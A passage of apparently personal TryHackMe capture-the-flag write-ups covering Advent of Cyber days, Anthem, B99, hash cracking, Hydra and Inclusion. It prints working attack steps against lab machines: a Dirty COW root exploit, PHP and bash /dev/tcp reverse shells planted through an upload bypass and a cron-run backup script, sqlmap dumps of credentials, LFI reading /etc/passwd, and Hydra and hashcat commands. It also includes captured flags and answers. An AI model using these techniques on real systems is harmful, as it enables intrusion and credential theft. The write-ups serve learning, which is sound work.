        co=$((RANDOM % (li-2) * 2 + 1 + start))
        tput setaf $color; tput bold   # Switch colors
        tput cup $li $co
        echo o
        line[$k$i]=$li
        column[$k$i]=$co
        color=$(((color+1)%8))
        # Flashing text
        sh=1
        for l in C y b e r
        do
            tput cup $((lin+1)) $((c+sh))
            echo $l
            let sh++
            sleep 0.01
        done
    }
    k=$((k % 2 + 1))
done
```
# dirty cow!!
follow the instructions in dirty.c. Compile the exploit and run it **BUT LEAVE THE PASSWORD EMPTY**. Telnet to the server again in a new tab, and run `su firefart`
```console
$ su firefart
Password:
firefart@christmas:/home/santa# whoami
firefart
firefart@christmas:/home/santa# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@christmas:/home/santa#
```
seems like the GRINCH left a message for us. let's read it
```console
firefart@christmas:/home/santa# ls /root
christmas.sh  message_from_the_grinch.txt
firefart@christmas:/home/santa# cat /root message_from_the_grinch.txt
cat: /root: Is a directory
cat: message_from_the_grinch.txt: No such file or directory
firefart@christmas:/home/santa# cat /root/message_from_the_grinch.txt
Nice work, Santa!

Wow, this house sure was DIRTY!
I think they deserve coal for Christmas, don't you?
So let's leave some coal under the Christmas `tree`!

Let's work together on this. Leave this text file here,
and leave the christmas.sh script here too...
but, create a file named `coal` in this directory!
Then, inside this directory, pipe the output
of the `tree` command into the `md5sum` command.

The output of that command (the hash itself) is
the flag you can submit to complete this task
for the Advent of Cyber!

- Yours,
John Hammond
er, sorry, I mean, the Grinch

- THE GRINCH, SERIOUSLY
```
the message from the GRINCH (John) tells us how to get the last flag, so let's create a file called coal using `touch`. to get the flag we run `tree` in `/root` and pipe it to `md5sum`
```
firefart@christmas:/home/santa# cd /root
firefart@christmas:~# touch coal
firefart@christmas:~# tree | md5sum
```
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber2/Day14.md:
--------------------------------------------------------------------------------
1. google `site:reddit.com IGuidetheClaus2020`
2. creator, google `rudolph the red nosed reindeer`
- parade? download the image and use image.google to search for it
- location
  - using `exiftool` but cannot find anything
  - back to twitter and I found another picture in high resolution https://tcm-sec.com/wp-content/uploads/2020/11/lights-festival-website.jpg
  - use `exiftool` or http://exif.regex.info/exif.cgi
- password, using `https://scylla.sh/api` and search for his password that you found on his twitter
- hotel, search the geolocation that you get from exiftool, look for the hotel closest to the location the picture was taken
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber2/Day2.md:
--------------------------------------------------------------------------------

to sign in visit: `?id=ODIzODI5MTNiYmYw`

from src code
```html

```
I then uploaded some pictures; sadly it doesn't show where the images are saved. I tried to use gobuster but the browser always returns the main page even though the requested page doesn't exist.
I then needed to try one by one; luckily I hit the correct directory on the first try: `/uploads`


prepare 2 reverse shells. you can find a php reverse shell by running `find / -name php-reverse* 2> /dev/null`. I changed the name and made it more cute :P. We know that the site only accepts `.jpeg,.jpg,.png` from studying the src page.


now let's change the name of the file and include .png in our reverse shell's name. since this page is poorly implemented, this should be enough to bypass it.
```console
┌──(kali㉿kali)-[~/THM/adventofcyber/2]
└─$ cp cutiecat.php cutiecat.png.php
```
Don't forget to change IP + Port in the script before uploading it. Open `nc` and listen/wait for the incoming reverse shell, then visit `/upload/cutiecat.png.php` to execute our shell!!


Boom
```
nc -nlvp 6969                                                       1 ⨯
listening on [any] 6969 ...
connect to [10.8.14.151] from (UNKNOWN) [10.10.122.94] 40866
Linux security-server 4.18.0-193.28.1.el8_2.x86_64 #1 SMP Thu Oct 22 00:20:22 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:32:13 up 20 min,  0 users,  load average: 0.00, 0.13, 0.45
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: cannot set terminal process group (818): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4$
```
let's go grab the flag
```
sh-4.4$ cat flag.txt
cat flag.txt


==============================================================


You've reached the end of the Advent of Cyber, Day 2 -- hopefully you're enjoying yourself so far, and are learning lots!
This is all from me, so I'm going to take the chance to thank the awesome @Vargnaar for his invaluable design lessons, without which the theming of the past two websites simply would not be the same.


Have a flag -- you deserve it!
THM{MGU3Y2UyMGUwNj___________}


Good luck on your mission (and maybe I'll see y'all again on Christmas Eve)!
--Muiri (@MuirlandOracle)


==============================================================
```
cya tomorrow, GL happy hacking!!
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber2/Day3.md:
--------------------------------------------------------------------------------
`admin:12345`
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber2/Day4.md:
--------------------------------------------------------------------------------
1. `wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ`

on `/api` you will find `site-log.php`. download the wordlist given by THM to your kali
```console
$ wc -l wordlist
63 wordlist
```
63 lines, not bad, it will go really fast. now use wfuzz to fuzz the different param
```console
$ wfuzz -c -z file,wordlist http://10.10.148.58/api/site-log.php?date=FUZZ

===================================================================
ID           Response   Lines    Word       Chars       Payload
===================================================================
.
000000001:   200        0 L      0 W        0 Ch        "20201100"
.
.
000000026:   200        0 L      1 W        13 Ch       "20201125"
.
.
.
```
most of the responses return 0 chars. note that `20201125` returned 13 chars!! so let's check it out by visiting `http://10.10.148.58/api/site-log.php?date=20201125`
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber2/Day5.md:
--------------------------------------------------------------------------------
/s**tap***l
/santapanel



```console
$ sqlmap -r day5 --tamper=space2comment
.
.
[07:46:20] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
```
Let's add `--level=5`:
```console
$ sqlmap -r day5 --tamper=space2comment --level 5
.
.
[07:48:20] [INFO] testing 'Generic inline queries'
[07:48:20] [INFO] testing 'SQLite inline queries'
[07:48:20] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[07:48:20] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[07:48:21] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[07:48:41] [INFO] GET parameter 'search' appears to be 'SQLite > 2.0 AND time-based blind (heavy query)' injectable
```
Yeah, something is happening here :D. Now just wait until the scan is done.


The next goal is to dump the database. SQLite is the DBMS, so we don't need to run `sqlmap --dbs`: SQLite doesn't have databases, **only tables**.
```console
└─$ sqlmap -r day5 --tamper=space2comment --level 5 --threads 10 --tables
.
.
Database: SQLite_masterdb
[3 tables]
+--------------+
| hidden_table |
| sequels      |
| users        |
+--------------+
```
`hidden_table` looks interesting, let's dump it!
```console
$ sqlmap -r day5 --tamper=space2comment --level 5 --threads 10 -T 'hidden_table' --dump
.
.
.
[08:02:13] [INFO] fetching entries for table 'hidden_table' in database 'SQLite_masterdb'
Database: SQLite_masterdb
Table: hidden_table
[1 entry]
+-----------------------------------------+
| flag                                    |
+-----------------------------------------+
| thmfox{All____________________________} |
+-----------------------------------------+
```

To find the admin password, dump the `users` table:
```console
$ sqlmap -r day5 --tamper=space2comment --level 5 --threads 10 -T 'users' --dump
.
.
.
[08:05:24] [INFO] fetching entries for table 'users' in database 'SQLite_masterdb'
Database: SQLite_masterdb
Table: users
[1 entry]
+------------------+----------+
| password         | username |
+------------------+----------+
| EhCNSWzzFP6sc7gB | admin    |
+------------------+----------+
```
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber2/Day7.md:
--------------------------------------------------------------------------------
# pcap1.pcap
To search for ICMP packets, type `icmp` in the filter bar. `http.request.method == GET` can be used to search for **HTTP GET requests**.


For the 3rd task I ran `http.request.method == GET and ip.src == 10.10.67.199`, filtering only HTTP GET requests from 10.10.67.199, where I found `/posts`, which I assume is the directory for articles.

# pcap2.pcap
Filter only `ftp` traffic and find `elfmcskidy`'s password (wrong password).

# pcap3.pcap
I noticed that there is HTTP traffic after analyzing the pcap. We learned how to export files from a pcap via File -> Export File -> HTTP, since we want to export data from the HTTP traffic. Here you will find `christmas.zip`; export it and extract the zip.
You will find `elf_mcskidy_wishlist.txt`; check the content of the file :D
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber2/Day8.md:
--------------------------------------------------------------------------------
Use my tool called pymap.py and run `sudo python3 pymap.py -t `; it will give you all the output you need to solve the task.
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber2/Day9.md:
--------------------------------------------------------------------------------
Connect to the FTP server with the `anonymous` account and get the files:
```console
┌──(kali㉿kali)-[~/THM/adventofcyber/9]
└─$ cat shoppinglist.txt
The Polar Express Movie

┌──(kali㉿kali)-[~/THM/adventofcyber/9]
└─$ cat backup.sh
#!/bin/bash

# Created by ElfMcEager to backup all of Santa's goodies!

# Create backups to include date DD/MM/YYYY
filename="backup_`date +%d`_`date +%m`_`date +%Y`.tar.gz";

# Backup FTP folder and store in elfmceager's home directory
tar -zcvf /home/elfmceager/$filename /opt/ftp

# TO-DO: Automate transfer of backups to backup server
```
In general, a backup script like this is executed automatically by a scheduled job, so let's try to put a new backup.sh containing a reverse shell on the FTP server:
```console
└─$ cat backup.sh
#!/bin/bash
bash -i >& /dev/tcp//6969 0>&1
```
Now open nc and wait for the reverse shell:
```console
$ nc -nlvp 6969
listening on [any] 6969 ...
connect to [10.8.14.151] from (UNKNOWN) [10.10.120.20] 60378
bash: cannot set terminal process group (1732): Inappropriate ioctl for device
bash: no job control in this shell
root@tbfc-ftp-01:~# ls
ls
flag.txt
root@tbfc-ftp-01:~# cat flag.txt
cat flag.txt
THM{______________________}
```
--------------------------------------------------------------------------------
/TryHackMe/Easy/Anthem.md:
--------------------------------------------------------------------------------
## nmap
```
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-robots.txt: 4 disallowed entries
|_/bin/ /config/ /umbraco/ /umbraco_client/
|_http-title: Anthem.com - Welcome to our blog
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: WIN-LU09299160F
|   NetBIOS_Domain_Name: WIN-LU09299160F
|   NetBIOS_Computer_Name: WIN-LU09299160F
|   DNS_Domain_Name: WIN-LU09299160F
|   DNS_Computer_Name: WIN-LU09299160F
|   Product_Version: 10.0.17763
|_  System_Time: 2020-08-01T11:44:11+00:00
| ssl-cert: Subject: commonName=WIN-LU09299160F
| Not valid before: 2020-04-04T22:56:38
|_Not valid after:  2020-10-04T22:56:38
|_ssl-date: 2020-08-01T11:44:19+00:00; +1s from scanner time.
```
## task 1 web recon
- Jane Doe : JD@anthem.com
- /SiteMap
- /archive/
- /archive/we-are-hiring/
- /archive/a-cheers-to-our-it-department/
- /authors/
- /authors/jane-doe/
- robots.txt
```


# Use for all search robots
User-agent: *

# Define the directories not to crawl
Disallow: /bin/
Disallow: /config/
Disallow: /umbraco/
Disallow: /umbraco_client/
```
- domain : Anthem.com. (on the web header & footer)
- /archive/a-cheers-to-our-it-department/: info about the admin
```
As we all around here knows how much I love writing poems I decided to write one about him:

Born on a Monday,
Christened on Tuesday,
Married on Wednesday,
Took ill on Thursday,
Grew worse on Friday,
Died on Saturday,
Buried on Sunday.
That was the end…
```
Wanna know the admin's name? Google his name.
- admin email? Jane Doe has JD@anthem.com as her email, so what does the admin have? (XX@anthem.com)

# task 2: flags
1. metadata tag
2. view source
3. author
4. metadata tag

# task 3:
We know that the server runs the Remote Desktop (RDP) service on port 3389. Moreover, we have user credentials, so we can log in to the server remotely. I'm using [Remmina](https://remmina.org/). Fill in the server IP, username, password, and lastly the domain, which we got from the nmap scan. See the figure below:
![rdp](pic/Screenshot%202020-08-01%20at%2016.16.24.png)
Now press save and connect!! BOOM! We are in; grab the user flag on the desktop.

Before we enumerate the server, let's start by configuring `File Explorer` so that we can see hidden files. How to do that?
![hidden](https://msegceporticoprodassets.blob.core.windows.net/inline-media/e84efe1a-ea59-4b5b-a19e-773ad9cbef3c-en)

Now look around; you will find an interesting file in `C:`. Note that you cannot read the .txt file because we don't have permission. The funny part is that we are able to edit the permissions. Add `SG` to the permission list as in the figure below:
![permision](pic/Screenshot%202020-08-01%20at%2017.25.20.png)

Voilà! It seems like it is the admin password. You can RDP to the server using Administrator as the username to gain root, OR spawn a shell as the root user with a simple cmd that I found [here](https://superuser.com/questions/617732/running-programs-as-root-in-non-root-shell-powershell).

Here is what I did:
![root](pic/Screenshot%202020-08-01%20at%2016.27.25.png)
--------------------------------------------------------------------------------
/TryHackMe/Easy/B99.md:
--------------------------------------------------------------------------------
# what I learned
- nothing...
# enumerating
- 21/tcp open ftp
```
ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17 23:17 note_to_jake.txt
```
the file contains
```console
kali@kali:~/THM/B99$ cat note_to_jake.txt
From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nin nine
```
- 22/tcp open ssh
- 80/tcp open http
  - Apache/2.4.29 (Ubuntu)
  - a stegano picture?
# foothold
```console
jake@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /usr/bin/less
```
https://gtfobins.github.io/gtfobins/less/

```console
jake@brookly_nine_nine:~$ less /home/amy/.
./             .bash_logout   .cache/        .profile
../            .bashrc        .gnupg/        .ssh/
jake@brookly_nine_nine:~$ less /home/holt/
.bash_history  .bashrc        .gnupg/        .profile       nano.save
.bash_logout   .cache/        .local/        .ssh/          user.txt
jake@brookly_nine_nine:~$ less /home/holt/user.txt
```
* amy
```
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,8A45EF5CE95F44B523FBD6AEEAD2B9E6

//MOmD5ttJ6rTXqLiBtvOmCcXLWmgexGwQZc2sy6P9mVlh9nUD2g2gN/SwyOIOzo
pWBjAatk7qpqwbsGDstQsKErCDGCH/qjF49zG1meMNbzxFQAT5vOxGM/0oYJwD9F
BKeRcOqY0vKjiJz0Wf9ZA3+CF3xdjNvVhneGe3BE1jEX2J3+sGZ0qiNLkYn6Mw+h
p0TrrdkFQiDR5X+rbfL+EgFYCwOanABkK+FzptbXB0ABte7L+PSICvZKsCn/yo6z
fxraAZ0nJejWQEYEH99o7T7uHkR+CZSD8gWPBsaP8pfPJSeKR9LzXG3MOWGc+5/p
gZBPQI5EwbUaWtnwEKqzTqT1G/+iYps8ExqUGj9lZWPnwNAEnWXiKJfTZF2lJyqz
-----END RSA PRIVATE KEY-----
```
**jake1**

* holt
```
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7FEB01DFD04064BFFC03CBB293CEF0F9
8rta3aQd8iUsjaUJ7S+j4wUbMhIGhWaSFOwuyDvKOfTEuFpNSv5DkA/p6D7qcBIE
eApPx3ASu2agU8IRvq0Z6IuWw1rvprmiXyBWCQ9NBOjIo4dnL6cLE+UmVmQThxst
hnxQNnTVZlFLdM5mJjNyzCyfsdvyu5QxsDfEtTCLBH3P8ittfeSWv1WlF0b6nkUO
-----END RSA PRIVATE KEY-----
```
**kevin**

```console
kali@kali:~/THM/B99$ nano holt.txt
kali@kali:~/THM/B99$ sudo /usr/share/john/ssh2john.py holt.txt > holt-for-john.txt
kali@kali:~/THM/B99$ sudo /usr/share/john/ssh2john.py amy.txt > amy-for-john.txt
root@kali:~# john /home/kali/THM/B99/holt-for-john.txt -wordlist=/usr/share/wordlists/rockyou.txt # holt
root@kali:~# john /home/kali/THM/B99/amy-for-john.txt -wordlist=/usr/share/wordlists/rockyou.txt # amy
kali@kali:~/THM/B99$ openssl rsa -in amy.txt -out amy_id_rsa
kali@kali:~/THM/B99$ openssl rsa -in holt.txt -out holt_id_rsa
```
but fuq... it didn't work,

# root
```console
jake@brookly_nine_nine:~$ less /root/root.txt
```

# PS
- There are two main intended ways to root the box.
- I only solved 1
--------------------------------------------------------------------------------
/TryHackMe/Easy/CrackTheHash.md:
--------------------------------------------------------------------------------
Links to [read](https://hashcat.net/wiki/doku.php?id=example_hashes) and [this](https://hkh4cks.com/blog/2018/02/05/password-cracking-tools/#hashcat)

# Task 1
Can you complete the level 1 tasks by cracking the hashes?


Find out what XXX stands for!! GL
1. ```hashcat -m XXX -a 0 -o task.txt "48bb6e862e54f2a795ffc4e541caed4d" /usr/share/wordlists/rockyou.txt --force```
2. sha1
3. sha256
4. kill me, it will take me 11 to crack this
5. https://md5decrypt.net/en/Md4/
6.

# Task 2

1. ```hashcat -m 1400 -a 0 -o task.txt "F09EDCB1FCEFC6DFB23DC3505A882655FF77375ED8AA2D1C13F640FCCC2D0C85" /usr/share/wordlists/rockyou.txt --force```
2. ```hashcat -m 1000 -a 0 -o task.txt "1DFECA0C002AE40B8619ECF94819CC1B" /usr/share/wordlists/rockyou.txt --force```
3. do this (single quotes matter: in double quotes the shell would expand `$6` and `$aReallyHardSalt` and mangle the hash)
```console
$ echo '$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.' > unix.hash
$ hashcat -m 1800 -a 0 -o task.txt unix.hash wordlist/rockyou.txt --force --self-test-disable # took like 1 hr
```
4. ```hashcat -m 160 -a 0 -o task.txt "e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme" /usr/share/wordlists/rockyou.txt --force```

```console
hashcat -m 3200 -a 0 -o crack.txt '$2a$06$7yoU3Ng8dHTXphAg913cyO6Bjs3K5lBnwq5FJyA6d01pMSrddr1ZG' /usr/share/wordlists/rockyou.txt --force
1800
$6$GQXVvW4EuM$ehD6jWiMsfNorxy5SINsgdlxmAEl3.yif0/c3NqzGLa0P.S7KRDYjycw5bnYkF5ZtB8wQy8KnskuWQS3Yr1wQ0
hashcat -m 1800 -a 0 -o crack.txt '$6$xQmTDVmT$hgSLG3ebs.8Tc/F4qqXNnvBBnG736EWpWKaprFVARjAsZ6JyoL4WaJdGv5.qddMWF4/MoJgN6Hekri8wyJ97k/' /usr/share/wordlists/rockyou.txt --force
```
--------------------------------------------------------------------------------
/TryHackMe/Easy/Hydra.md:
--------------------------------------------------------------------------------
# Hydra Commands

The options we pass into Hydra depend on which service (protocol) we're attacking. For example, if we wanted to brute-force FTP with the username being user and a password list being passlist.txt, we'd use the following command:

```hydra -l user -P passlist.txt ftp://192.168.0.1```

For the purpose of this deployed machine, here are the commands to use Hydra on SSH and a web form (POST method).
## SSH

```hydra -l -P -t 4 ssh```
[-h](https://i.imgur.com/D71vkKM.png)

```console
kali@kali:~$ hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.39.3 -t 4 ssh
Hydra v9.1-dev (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-03 12:51:58
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.39.3:22/
[22][ssh] host: 10.10.39.3   login: molly   password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-03 12:52:51
kali@kali:~$ ssh molly@10.10.39.3
The authenticity of host '10.10.39.3 (10.10.39.3)' can't be established.
ECDSA key fingerprint is SHA256:CvZ/M3lLX1Nv/BtNNW9Cb+JYa2z85ldNGQdNp0HwQ9U.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.39.3' (ECDSA) to the list of known hosts.
molly@10.10.39.3's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-1092-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

65 packages can be updated.
32 updates are security updates.


Last login: Tue Dec 17 14:37:49 2019 from 10.8.11.98
molly@ip-10-10-39-3:~$ ls
flag2.txt
molly@ip-10-10-39-3:~$ cat flag2.txt
THM{c8eeb0468febbadea859baeb33b2541b}
```
flag = ```THM{c8eeb0468febbadea859baeb33b2541b}```


## Post Web Form

We can use Hydra to brute-force web forms too; you will have to make sure you know which type of request it's making: GET or POST methods are normally used. You can use your browser's network tab (in developer tools) to see the request types, or simply view the source code.
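The same two Hydra runs seen from the defender's side, as an added example that is not part of these notes: both attacks produce thousands of login attempts from one source IP in a few seconds, which is easy to spot by counting per-IP events inside a sliding window. The log formats, IPs, thresholds and helper names below are assumptions, and the log lines are constructed, not real captures.

```python
"""Rate-based detection of the SSH and POST /login brute force (added example).
sshd auth.log lines and nginx-style access log lines are parsed, events are
grouped per source IP, and any IP with >= threshold events inside a sliding
window is reported. Formats, IPs and thresholds are assumptions for the demo."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SSH_FAIL = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)
# The room's form answers 200 plus an "incorrect" message (the F= string Hydra
# matched), so a status-code filter would miss it: count POSTs instead.
WEB_POST = re.compile(
    r'^(?P<ip>[\d.]+) \S+ \S+ \[(?P<ts>[^\]]+)\] "POST (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_ssh_ts(stamp, year=2020):
    """auth.log carries no year; the caller supplies it."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def parse_web_ts(stamp):
    """'03/May/2020:13:09:26 +0000' -> datetime (offset ignored in the demo)."""
    return datetime.strptime(stamp.split(" ")[0], "%d/%b/%Y:%H:%M:%S")


def ssh_failures(lines):
    """Map source IP -> timestamps of failed SSH password attempts."""
    events = defaultdict(list)
    for line in lines:
        m = SSH_FAIL.search(line)
        if m:
            events[m["ip"]].append(parse_ssh_ts(m["ts"]))
    return events


def web_login_posts(lines, path="/login"):
    """Map source IP -> timestamps of POSTs to the login form."""
    events = defaultdict(list)
    for line in lines:
        m = WEB_POST.search(line)
        if m and m["path"] == path:
            events[m["ip"]].append(parse_web_ts(m["ts"]))
    return events


def burst_sources(events, threshold, window_seconds):
    """Return {ip: peak_count} for IPs with >= threshold events inside any
    window of window_seconds (two-pointer sweep over sorted timestamps)."""
    hits = {}
    for ip, stamps in events.items():
        stamps = sorted(stamps)
        left, peak = 0, 0
        for right, t in enumerate(stamps):
            while (t - stamps[left]).total_seconds() > window_seconds:
                left += 1
            peak = max(peak, right - left + 1)
        if peak >= threshold:
            hits[ip] = peak
    return hits


def constructed_auth_log():
    """Constructed: 40 failures for molly from one IP within 20 s, then the
    success, plus two unrelated failures minutes apart from another IP."""
    base = datetime(2020, 5, 3, 12, 51, 58)
    lines = []
    for i in range(40):
        t = base + timedelta(seconds=i // 2)
        lines.append(f"{t:%b} {t.day:>2} {t:%H:%M:%S} ip-10-10-39-3 sshd[{2200 + i}]: "
                     f"Failed password for molly from 10.8.11.98 port {40000 + i} ssh2")
    lines.append("May  3 12:52:51 ip-10-10-39-3 sshd[2290]: Accepted password for molly from 10.8.11.98 port 40400 ssh2")
    lines.append("May  3 12:55:00 ip-10-10-39-3 sshd[2300]: Failed password for invalid user bob from 10.8.11.99 port 50000 ssh2")
    lines.append("May  3 12:58:30 ip-10-10-39-3 sshd[2310]: Failed password for invalid user bob from 10.8.11.99 port 50001 ssh2")
    return lines


def constructed_access_log():
    """Constructed: 30 POST /login from one IP within 3 s plus normal browsing."""
    base = datetime(2020, 5, 3, 13, 9, 26)
    lines = ['10.10.5.5 - - [03/May/2020:13:08:00 +0000] "GET / HTTP/1.1" 200 2048',
             '10.10.5.5 - - [03/May/2020:13:08:05 +0000] "POST /login HTTP/1.1" 200 1532']
    for i in range(30):
        t = base + timedelta(seconds=i // 10)
        lines.append(f'10.8.11.98 - - [{t:%d/%b/%Y:%H:%M:%S} +0000] "POST /login HTTP/1.1" 200 1532')
    return lines


if __name__ == "__main__":
    print("ssh bursts:", burst_sources(ssh_failures(constructed_auth_log()), 20, 60))
    print("web bursts:", burst_sources(web_login_posts(constructed_access_log()), 20, 60))
```

With a 20-events-per-60-seconds threshold only the brute-forcing source is reported for both logs; the legitimate single login and the two slow failures from the other IP stay below it.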

Below is an example Hydra command to brute-force a POST login form:

```hydra -l -P http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V```

- [-h](https://i.imgur.com/vC3ZU4E.png)
- [check this to understand how to use it](https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/)



```console
kali@kali:~$ hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.39.3 http-post-form "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect."
Hydra v9.1-dev (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-03 13:09:26
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.39.3:80/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect.
[80][http-post-form] host: 10.10.39.3   login: molly   password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-03 13:09:29
```
```html
THM{2673a7dd116de68e85c48ec0b1f2612e}
```

flag = ```THM{2673a7dd116de68e85c48ec0b1f2612e}```
--------------------------------------------------------------------------------
/TryHackMe/Easy/Inclusion.md:
--------------------------------------------------------------------------------
# Local File Inclusion (LFI)
[LFI](https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/)

# nmap
```console
kali@kali:~$ sudo python3 pymap.py -t 10.10.14.166
created by gu2rks/kurohat
find me here https://github.com/gu2rks

port scanning...
22/tcp open  ssh
80/tcp open  http
Enumerating open ports...
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 09:05 EDT
Nmap scan report for 10.10.14.166
Host is up (0.044s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
|   256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_  256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-server-header: Werkzeug/0.16.0 Python/3.6.9
|_http-title: My blog
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   43.17 ms 10.8.0.1
2   43.17 ms 10.10.14.166

OS and Service detection performed.
Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.20 seconds
```

# foothold
- hacking http://10.10.14.166/article?name=hacking
- LFI http://10.10.14.166/article?name=lfiattack
- Remote File Inclusion (RFI) http://10.10.14.166/article?name=rfiattack

It seems like the LFI is here: ```http://10.10.14.166/article?name=```. Let's try it out by requesting `/etc/passwd`.


```http://10.10.14.166/article?name=../../../../../../../etc/passwd```. BINGO !!
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
